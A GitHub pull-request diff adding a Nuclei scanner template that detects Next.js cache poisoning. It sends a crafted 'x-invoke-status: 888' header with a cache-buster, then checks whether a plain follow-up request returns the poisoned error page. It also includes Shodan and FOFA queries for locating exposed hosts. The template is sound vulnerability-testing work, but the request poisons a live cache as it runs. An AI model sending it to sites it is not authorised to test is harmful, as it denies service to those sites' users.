Merge pull request #10120 from projectdiscovery/nextjs-cache-posioning

Create nextjs-cache-poisoning.yaml

http/vulnerabilities/next-js-cache-poisoning.yaml

@@ -0,0 +1,43 @@
+id: next-js-cache-poisoning
+
+info:
+  name: Next.js Cache Poisoning
+  author: Ice3man543
+  severity: high
+  description: |
+    Next.js is vulnerable to cache poisoning through the x-middleware-prefetch and x-invoke-status headers. This can result in DoS by serving an empty JSON object or error page instead of the intended content, affecting SSR responses.
+  reference:
+    - https://github.com/vercel/next.js/compare/v13.4.20-canary.12...v13.4.20-canary.13
+    - https://github.com/valentin-panov/nextjs-no-cache-issue
+    - https://zhero-web-sec.github.io/research-and-things/nextjs-and-cache-poisoning-a-quest-for-the-black-hole
+  metadata:
+    vendor: vercel
+    product: next.js
+    framework: node.js
+    shodan-query:
+      - http.html:"/_next/static"
+      - cpe:"cpe:2.3:a:zeit:next.js"
+    fofa-query: body="/_next/static"
+  tags: cve,cve2023,next-js,cache
+
+variables:
+  rand: "{{rand_text_numeric(5)}}"
+
+http:
+  - raw:
+      - |
+        GET /?cb={{rand}} HTTP/1.1
+        Host: {{Hostname}}
+        Priority: u=1
+        x-invoke-status: 888
+
+      - |
+        GET /?cb={{rand}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_1 == 888 && contains(body_1, '/_error')"
+          - "status_code_2 == 888 && contains(body_2, '/_error')"
+        condition: and